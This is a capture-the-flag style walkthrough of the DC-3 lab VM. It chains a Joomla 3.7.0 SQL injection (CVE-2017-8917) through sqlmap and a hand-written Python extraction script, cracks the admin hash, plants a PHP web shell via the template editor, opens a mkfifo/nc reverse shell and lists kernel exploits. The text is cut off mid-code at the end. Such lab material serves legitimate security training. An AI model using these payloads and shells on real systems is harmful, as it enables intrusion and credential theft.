1. Information gathering
Use nmap to find live hosts on the local network:
sudo nmap -PS -Pn 192.168.75.0/24
(A caveat on the flags: -Pn skips host discovery entirely, so the -PS TCP SYN ping is never sent and nmap simply port-scans every address in the /24; the host shows up because its port 80 answers. A pure ping sweep would be nmap -sn.)
Note DC-3's MAC address beforehand, from the VM settings, so the right host can be picked out of the results (figure):
The scan finds the target's IP:
Nmap scan report for 192.168.75.131
Host is up (0.0017s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:1F:91:04 (VMware)
Now scan the target fully to enumerate every open port and service and gather more detail:
sudo nmap -Pn -A -p- 192.168.75.131
The target runs Ubuntu, the web server is Apache 2.4.18 and the site is built on Joomla; port 80 is the only open port. Scan results:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 09:32 EDT
Nmap scan report for 192.168.75.131
Host is up (0.023s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:1F:91:04 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 23.33 ms 192.168.75.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.69 seconds
Open the IP in a browser (figure):
Clicking around shows that accounts cannot be registered, and the admin login is evidently not on the public site, which points to directory brute-forcing. On Kali, run dirbuster in a terminal to launch the GUI and configure it as follows (figure):
(The wordlist chosen here may miss entries; directory-list-2.3-small is sufficient for this target.)
DirBuster produced the following report:
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Fri Aug 14 10:25:49 EDT 2020
--------------------------------
http://192.168.75.131:80
--------------------------------
Directories found during testing:
Dirs found with a 301 response:
/images
/media
/templates
/modules
/bin
/plugins
/includes
/language
/components
/cache
/libraries
/tmp
/layouts
/administrator
/cli
Dirs found with a 200 response:
/
/images/
/media/
/templates/
/modules/
/index.php/
/index.php/2-uncategorised/
/bin/
/plugins/
/includes/
/media/jui/
/media/jui/js/
/language/
/media/system/
/media/system/images/
/media/system/js/
/components/
/media/system/css/
/media/jui/css/
/libraries/
/cache/
/templates/protostar/
/media/jui/fonts/
/templates/protostar/js/
/media/jui/images/
/media/jui/img/
/media/jui/less/
/media/system/css/fields/
/tmp/
/layouts/
/administrator/
/administrator/templates/
/administrator/templates/isis/
/administrator/templates/isis/images/
/administrator/templates/system/
/administrator/templates/isis/images/admin/
/administrator/templates/isis/images/system/
/administrator/templates/hathor/
/cli/
Dirs found with a 500 response:
/index.php/component/users/
Dirs found with a 403 response:
/icons/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/index.php/2-uncategorised/1-welcome
/index.php
/media/jui/js/jquery.min.js
/media/jui/js/jquery-noconflict.js
/media/jui/js/jquery-migrate.min.js
/media/system/js/caption.js
/media/jui/js/bootstrap.min.js
/templates/protostar/js/template.js
/index.php/2-uncategorised
/media/system/js/core.js
/media/system/js/keepalive.js
/media/system/js/punycode.js
/media/system/js/validate.js
/media/system/css/adminlist.css
/media/system/js/html5fallback.js
/media/system/css/calendar-jos.css
/media/jui/css/bootstrap-extended.css
/templates/protostar/js/application.js
/media/jui/fonts/IcoMoon.dev.commented.svg
/media/jui/css/bootstrap-responsive.css
/templates/protostar/js/classes.js
/media/system/css/frontediting.css
/media/jui/fonts/IcoMoon.dev.svg
/media/jui/css/bootstrap-responsive.min.css
/media/system/css/jquery.Jcrop.min.css
/media/jui/fonts/IcoMoon.eot
/media/jui/css/bootstrap-rtl.css
/media/system/css/modal.css
/media/jui/css/bootstrap-tooltip-extended.css
/media/jui/fonts/IcoMoon.svg
/media/system/css/mootree.css
/media/system/css/mootree_rtl.css
/media/jui/css/bootstrap.css
/media/jui/fonts/IcoMoon.ttf
/media/jui/css/bootstrap.min.css
/media/system/css/system.css
/media/jui/fonts/IcoMoon.woff
/media/jui/css/chosen.css
/media/jui/fonts/icomoon-license.txt
/media/jui/css/icomoon.css
/media/jui/css/jquery.minicolors.css
/media/jui/css/jquery.searchtools.css
/media/system/css/fields/calendar-rtl.css
/media/jui/css/jquery.simplecolors.css
/media/system/css/fields/calendar.css
/media/jui/css/sortablelist.css
/administrator/index.php
The report shows an /administrator directory. Opening it in the browser gives the Joomla administrator login page (figure).
The next job is to get a username and password to log in with. But how?
Time to change approach and take stock of what is known about the target:
The OS is Ubuntu, release still unknown; the web server is Apache 2.4.18; the site is built on Joomla.
searchsploit does list exploits for Apache 2.x, but we will not start from the web server here.
Joomla has its own scanner, OWASP JoomScan, which can pull out useful details such as the exact version. Install it on Kali by cloning the repository (it is also packaged in Kali as joomscan):
git clone https://github.com/rezasp/joomscan.git
Enter the joomscan directory:
cd joomscan
Scan the Joomla site:
perl joomscan.pl -u 192.168.75.131
Scan results:
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.75.131 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.75.131/administrator/components
http://192.168.75.131/administrator/modules
http://192.168.75.131/administrator/templates
http://192.168.75.131/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.75.131/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.75.131/
That gives the target's Joomla version: 3.7.0.
Search Exploit-DB for it on Kali:
searchsploit joomla 3.7.0
Results (figure):
Show the details of the matching entry:
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
Contents:
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
So Joomla 3.7.0 has a SQL injection vulnerability (CVE-2017-8917) in the com_fields component, and the entry gives the vulnerable URL:
http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
a ready-made sqlmap command:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
and the injection techniques that work against it, each with a payload:
Type: boolean-based blind
Type: error-based
Type: AND/OR time-based blind
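The error-based technique listed above can be driven by hand, which makes clear what sqlmap does with each request. The Python below is an added example written for this page; it is not code from the original write-up, from Joomla or from Exploit-DB entry 42033. It assumes MySQL's behaviour when updatexml() is handed an invalid XPath: the server answers with an error containing "XPATH syntax error: '<text>'" and keeps at most 32 characters of <text>, so a 60-character bcrypt hash has to be read back in substr() chunks. The target URL is the one from the write-up; the response bodies are constructed here so the example runs offline (the real ones would be Joomla's 500 page).

```python
"""Manual error-based extraction for the com_fields ordering injection (CVE-2017-8917).

Added example for this page; not the original write-up's, Joomla's or Exploit-DB's code.
Assumption: MySQL reports an invalid XPath given to updatexml() as
"XPATH syntax error: '<text>'" and keeps at most 32 characters of <text>.
"""
import re
from typing import List, Optional
from urllib.parse import urlencode

TARGET = "http://192.168.75.131/index.php"      # host from the write-up
CHUNK = 31                                       # 32-char error limit minus the 0x7e marker
ERROR_RE = re.compile(r"XPATH syntax error: '~(.*?)'")

# Hash that sqlmap recovered in the write-up; used here only to build fake responses.
KNOWN_HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"


def build_url(expression: str) -> str:
    """Wrap a SQL expression in updatexml() and place it in list[fullordering].

    0x7e ('~') is prepended so the whole value, not just the part MySQL fails
    to parse, is echoed in the error text.
    """
    payload = f"updatexml(1,concat(0x7e,({expression})),1)"
    query = urlencode({"option": "com_fields", "view": "fields", "layout": "modal",
                       "list[fullordering]": payload})
    return f"{TARGET}?{query}"


def chunk_expressions(column_expr: str, total_len: int) -> List[str]:
    """substr() expressions that cover total_len characters, CHUNK at a time."""
    return [f"substr(({column_expr}),{start},{CHUNK})"
            for start in range(1, total_len + 1, CHUNK)]


def extract_leak(body: str) -> Optional[str]:
    """Return the text MySQL echoed back, or None if the error did not fire."""
    match = ERROR_RE.search(body)
    return match.group(1) if match else None


def reassemble(bodies: List[str]) -> str:
    """Join the chunk responses in order; a missing chunk aborts instead of corrupting."""
    parts = []
    for index, body in enumerate(bodies):
        leak = extract_leak(body)
        if leak is None:
            raise ValueError(f"chunk {index}: no XPATH error in response")
        parts.append(leak)
    return "".join(parts)


def constructed_responses(secret: str) -> List[str]:
    """Constructed stand-in for the server's 500 pages, one per chunk (offline use)."""
    return [f"<h1>Error</h1><p>XPATH syntax error: '~{secret[i:i + CHUNK]}'</p>"
            for i in range(0, len(secret), CHUNK)]


if __name__ == "__main__":
    column = "select password from `#__users` limit 1"   # table prefix as sqlmap reported it
    for expr in chunk_expressions(column, len(KNOWN_HASH)):
        print(build_url(expr))
    print(reassemble(constructed_responses(KNOWN_HASH)))
```

In a live run, build_url() gives one request per chunk expression and reassemble() is fed the response bodies in the same order; the table name must use the prefix sqlmap reports for the target, which on this box is the literal #__.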
2. Exploiting the SQL injection
Use sqlmap directly to pull information out of the database.
First enumerate the database names. Dropping --level=5 is advisable: level 5 runs every test sqlmap knows and is very slow, and the injection point is already confirmed:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch --dbs -p list[fullordering]
--random-agent sends a randomly chosen browser User-Agent instead of sqlmap's default, which would otherwise identify the tool in the target's logs or to a WAF.
--dbs lists all database names.
--batch accepts the default answer to every prompt.
-p names the injectable parameter up front, so sqlmap does not waste time testing the others.
The --risk parameter,
The run returns every database name:
[12:05:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[12:05:49] [INFO] fetching database names
[12:05:49] [INFO] retrieved: 'information_schema'
[12:05:49] [INFO] retrieved: 'joomladb'
[12:05:49] [INFO] retrieved: 'mysql'
[12:05:49] [INFO] retrieved: 'performance_schema'
[12:05:49] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
Clearly joomladb is the site's database. Next, list its tables:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch -p list[fullordering] -D "joomladb" --tables
--dbs is dropped, and -D "joomladb" plus --tables select the database and list its tables. Output:
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
[12:10:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 93 times
[12:10:43] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.75.131'
[*] ending @ 12:10:43 /2020-08-14/
A table named #__users stands out as the likely store of user accounts. Get its column names:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns
-T "#__users" and --columns select the table and request its columns.
Note that --batch is left out this time: sqlmap asks questions during column enumeration on this target, and the answers need to be chosen rather than defaulted (figure):
This yields the table's columns:
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | numeric |
| name | non-numeric |
| password | non-numeric |
| email | non-numeric |
| params | non-numeric |
| username | non-numeric |
+----------+-------------+
Next, dump the name and password columns:
sqlmap -u "http://192.168.75.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C "name,password" --dump
-C "name,password" selects the columns to retrieve and --dump pulls their contents. Result:
Database: joomladb
Table: #__users
[1 entry]
+--------+--------------------------------------------------------------+
| name | password |
+--------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+--------+--------------------------------------------------------------+
That gives the admin username and its password hash.
Save the hash to a file (figure):
Crack it with John the Ripper:
john password_hash.txt
The $2y$ prefix marks a bcrypt hash, which John recognises on its own. bcrypt is deliberately slow, so point John at a wordlist with --wordlist (rockyou.txt on Kali) rather than leaving it on its default modes, and run the cracking pass and --show as the same user, since John keeps its results in that user's john.pot.
When it finishes, display the result:
john password_hash.txt --show
Result (figure):
With username and password recovered, log in to the administrator backend (figure):
3. Deeper scanning
With credentials in hand we can reach far more of the site, and the authenticated surface is where further vulnerabilities are likely, so run an authenticated scan with a web application scanner. AWVS has to be obtained separately; installation is not covered here.
Start AWVS (figure):
Open port 3443 on localhost in the browser and log in to AWVS (figure):
Click Targets -> Add Target, enter the target and click Save (figure):
Only the Site Login setting needs attention: enter the cracked credentials, save, then click Scan (figure):
Click Create Scan to start (figure):
Then a long wait....
The scan reports many high-severity findings; click the red indicator to view them (figure):
They include SQL injection, XSS, CSRF, file upload, local file inclusion, directory listing and more, which gives plenty of leads.
4. Getting a web shell
Browsing the backend, go to Extensions -> Templates -> Templates and click Beez3: this opens the template file editor (figure).
That is a new avenue. Click New File, create a PHP file and write a one-line web shell into it (figure).
Save it, then work out how to reach it. Joomla's directory layout is fixed and well documented, so the new file's location is easy to infer: template files live under /templates/<template>/, and the file created here is at:
http://192.168.75.131/templates/beez3/html/shell.php
Request that URL in the browser; the web shell executes (figure).
Connect to it with AntSword (figure):
After saving, right-click and choose the virtual terminal (figure):
ip addr confirms we are on the target, and whoami shows which user the shell runs as (figure).
The web shell we have runs over HTTP, which is stateless: each command is sent in a fresh request and executed by a new process, so nothing (the working directory, environment variables, a cd) survives from one command to the next. A reverse shell gives a persistent connection instead. nc -h shows the target has nc, but this build lacks -e (which would execute a program after the connection is made), so the usual nc -e /bin/bash reverse shell is not available (figure).
Use this command to spawn a reverse shell instead:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.75.130 6666 > /tmp/f
How it works: rm /tmp/f removes any leftover file, then mkfifo /tmp/f creates a named pipe (a FIFO: whatever is written at one end can be read at the other, first in, first out). cat /tmp/f reads from the pipe and the pipe operator feeds whatever arrives to /bin/bash -i; bash executes those commands, and its output (stderr merged into stdout by 2>&1) is piped into nc, which sends it to the listening host (Kali). Anything typed on Kali travels back over the same nc connection, and the trailing > /tmp/f writes it into the FIFO, where cat picks it up and hands it to bash. That closes the loop: as long as the nc connection stays up, commands keep flowing.
First, start a listener on port 6666 on Kali:
sudo nc -lnvp 6666
(figure)
Then run the command above in the AntSword virtual terminal; on pressing Enter the listener receives the shell (figure):
Reverse shell obtained!
If the shell is not interactive (no proper prompt, no job control), upgrade it with:
python3 -c 'import pty;pty.spawn("/bin/bash")'
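The statelessness described above can also be worked around on the client side, which is one way a web shell client can offer something that feels like a terminal without a reverse shell. The Python below is an added example written for this page, not the write-up's code and not AntSword's: fake_webshell() is a stand-in for the PHP one-liner that runs every command in a fresh /bin/sh (a real client would POST the command to shell.php instead), and StatefulShell wraps any such executor so that a cd persists, by replaying "cd <dir> &&" in front of each command and reading the resulting directory back from a trailing pwd. It assumes a POSIX /bin/sh on the machine it runs on.

```python
"""Keeping state across a stateless one-line web shell (added example, not from the write-up).

fake_webshell() stands in for the PHP one-liner: every call spawns a new /bin/sh,
so a 'cd' in one call is gone by the next. StatefulShell wraps any such executor and
carries the working directory itself. Assumes a POSIX /bin/sh is present.
"""
import os
import shlex
import subprocess
import tempfile
from typing import Callable, List, Tuple


def fake_webshell(command: str) -> str:
    """Stand-in for shell.php: a brand-new process per command, output returned as text."""
    proc = subprocess.run(["/bin/sh", "-c", command], capture_output=True, text=True)
    return proc.stdout + proc.stderr


def run_stateless(commands: List[str]) -> List[str]:
    """The naive loop: each command is sent on its own, so 'cd' never sticks."""
    return [fake_webshell(c).strip() for c in commands]


class StatefulShell:
    """Replays 'cd <cwd> &&' before each command and re-learns cwd from a trailing pwd."""

    SENTINEL = "__CWD__"   # separates the command's output from the pwd line

    def __init__(self, execute: Callable[[str], str] = fake_webshell, cwd: str = "/"):
        self.execute = execute
        self.cwd = cwd

    def run(self, command: str) -> str:
        # '{ ...; }' keeps a 'cd' inside the command in the same shell, so the
        # pwd that follows reports the directory the user actually ended up in.
        wrapped = (f"cd {shlex.quote(self.cwd)} && {{ {command} ; }} ; "
                   f"printf '\\n{self.SENTINEL}%s\\n' \"$(pwd)\"")
        raw = self.execute(wrapped)
        output, sep, tail = raw.rpartition("\n" + self.SENTINEL)
        if sep:                       # sentinel present: update the tracked directory
            self.cwd = tail.strip()
        return output.strip()


def demo() -> Tuple[str, str, str]:
    """Run 'cd <tmp>' then 'pwd' both ways; returns (target, naive_pwd, tracked_pwd)."""
    target = os.path.realpath(tempfile.gettempdir())
    commands = ["cd " + shlex.quote(target), "pwd"]
    naive = run_stateless(commands)[1]
    shell = StatefulShell()
    shell.run(commands[0])
    tracked = shell.run(commands[1])
    return target, naive, tracked


if __name__ == "__main__":
    target, naive, tracked = demo()
    print(f"target  : {target}")
    print(f"naive   : {naive}")      # wherever the web server process happened to start
    print(f"tracked : {tracked}")    # equals target
```

The wrapper only restores the working directory; environment variables, background jobs and an interactive program's state are still lost between requests, which is why the reverse shell above remains the better tool once it is available.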
5. Privilege escalation
Privilege escalation usually relies on an OS or kernel vulnerability, so the first step is to pin down the exact distribution release and kernel version.
uname -a # kernel version
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
cat /etc/issue # OS release
Ubuntu 16.04 LTS \n \l
cat /etc/*-release # OS release, in detail
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
Distribution and kernel, summarised:
Ubuntu 16.04 4.4.0-21-generic
The Linux privilege escalation helper linux-exploit-suggester gathers the same information and lists candidate exploits for that version. Download it from GitHub:
https://github.com/mzet-/linux-exploit-suggester/archive/master.zip
Unzip it, upload linux-exploit-suggester.sh to the target's /tmp directory through AntSword, and make it executable (figure).
Then run the script on the target (not on Kali: it inspects the machine it runs on), ./linux-exploit-suggester.sh. Output:
Available information:
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
74 kernel space exploits
45 user space exploits
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
Plainly this kernel has plenty of candidate vulnerabilities. We pick this one, because its tag matches the exact kernel build (ubuntu=16.04 with 4.4.0-21-generic), and its prerequisites can be checked before running anything: sysctl kernel.unprivileged_bpf_disabled should report 0 on the target.
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
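Why does the suggester rate CVE-2016-4557 as matching this box exactly while the af_packet entry only matches the distribution? The tags encode it: "ubuntu=16.04{kernel:4.4.0-21-generic}" names both a release and a kernel build, and the tool brackets the part that matched. The Python below is an added example written for this page, not linux-exploit-suggester's own code: a simplified matcher for those tags, run against the DC-3 facts gathered above (distro ubuntu, version 16.04, kernel 4.4.0-21-generic). Its assumptions: '*' in a kernel pattern is a wildcard, '(a|b)' is an alternation, the '[ ... ]' brackets are only the tool's highlighting, and the three-way result (exact / distro / none) is this example's simplification of the tool's "highly probable / probable / less probable" rating.

```python
"""Simplified re-implementation of linux-exploit-suggester's tag matching.

Added example for this page, not the tool's code. Tags look like
"distro=version{kernel:pattern}", comma-separated; '*' is a wildcard and '(a|b)'
an alternation in the kernel pattern; '[ ... ]' is only the tool's highlighting.
"""
import re
from typing import List, Optional

# What uname -a and /etc/*-release reported on DC-3 (from the write-up)
DC3 = {"distro": "ubuntu", "version": "16.04", "kernel": "4.4.0-21-generic"}

TAG_RE = re.compile(r"^(?P<distro>[A-Za-z]+)=(?P<versions>[^{]+?)"
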